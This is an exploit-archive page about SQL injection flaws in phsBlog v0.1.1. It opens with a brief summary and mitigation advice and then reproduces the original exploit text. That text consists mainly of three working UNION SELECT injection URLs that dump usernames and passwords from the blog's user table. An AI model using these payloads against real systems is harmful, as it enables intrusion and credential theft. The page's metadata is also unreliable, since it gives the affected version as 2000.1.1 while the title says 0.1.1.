header-logo
Suggest Exploit
vendor:
phsBlog
by:
cOndemned
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phsBlog
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:phsblog:phsblog:0.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities

Multiple Remote SQL Injection Vulnerabilities exist in phsBlog v0.1.1. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The vulnerabilities exist due to insufficient sanitization of user-supplied input in the 'eid' and 'urltitle' parameters of the 'comments.php' and 'entries.php' scripts respectively. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable scripts. Successful exploitation of these vulnerabilities can result in unauthorized access to sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be kept up-to-date with the latest security patches.
Source

Exploit-DB raw data:

#####################################################################################
#
#   Name    :   phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities
#   Author  :   cOndemned [Dark-Coders member]
#   Greetz  :   ZaBeaTy, GregStar, str0ke, 0in, suN8Hclf, ixos, TBH, Avantura :**
#
#####################################################################################


Proof of Concept :

    Magic Quotes = On/Off 

        http://[host]/[phsBlog_path]/comments.php?eid=-1+UNION+SELECT+concat_ws(0x3a,username,password),2+FROM+phsblog_users/*

    Magic Quotes = Off

        http://[host]/[phsBlog_path]/index.php?cid='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users/*
        http://[host]/[phsBlog_path]/entries.php?urltitle='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users

# milw0rm.com [2008-08-01]